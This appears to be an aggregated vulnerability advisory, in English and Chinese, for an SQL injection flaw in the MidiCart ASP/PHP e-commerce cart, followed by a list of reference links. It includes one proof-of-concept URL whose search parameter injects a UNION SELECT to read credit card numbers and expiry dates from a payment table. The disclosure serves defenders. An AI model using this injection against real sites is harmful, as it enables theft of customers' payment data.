https://www.exploit-db.com/exploits/25614
https://www.securityfocus.com/bid/14545
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-961

MidicartASP是一款Coxco支持的商业性质的电子商务解决方案，可使用在MicrosoftWindows操作系统下。MidicartASP处理用户请求时存在输入验证漏洞，远程攻击者可以利用这个漏洞非授权访问数据库。

source: http://www.securityfocus.com/bid/13512/info

MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

http://www.example.com/shop/search_list.php?chose=item&searchstring=a%' UNION SELECT null, null, CreditCard, ExpDate, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment

MidiCart Software MidiCart ASP

来源:XF
名称:midicart-sql-injection(20428)
链接:http://xforce.iss.net/xforce/xfdb/20428
来源:BID
名称:13515
链接:http://www.securityfocus.com/bid/13515
来源:BID
名称:13514
链接:http://www.securityfocus.com/bid/13514
来源:BID
名称:13513
链接:http://www.securityfocus.com/bid/13513
来源:BID
名称:13512
链接:http://www.securityfocus.com/bid/13512
来源:OSVDB
名称:16177
链接:http://www.osvdb.org/16177
来源:OSVDB
名称:16176
链接:http://www.osvdb.org/16176
来源:OSVDB
名称:16175
链接:http://www.osvdb.org/16175
来源:MISC
链接:http://www.hackgen.org/advisories/hackgen-2005-004.txt
来源:SECUNIA
名称:15269
链接:http://secunia.com/advisories/15269
来源:BUGTRAQ
名称:20050505[hackgen-2005-#004]-MultiplebugsinMidiCartPHPShoppingCart
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111533057918993&w;=2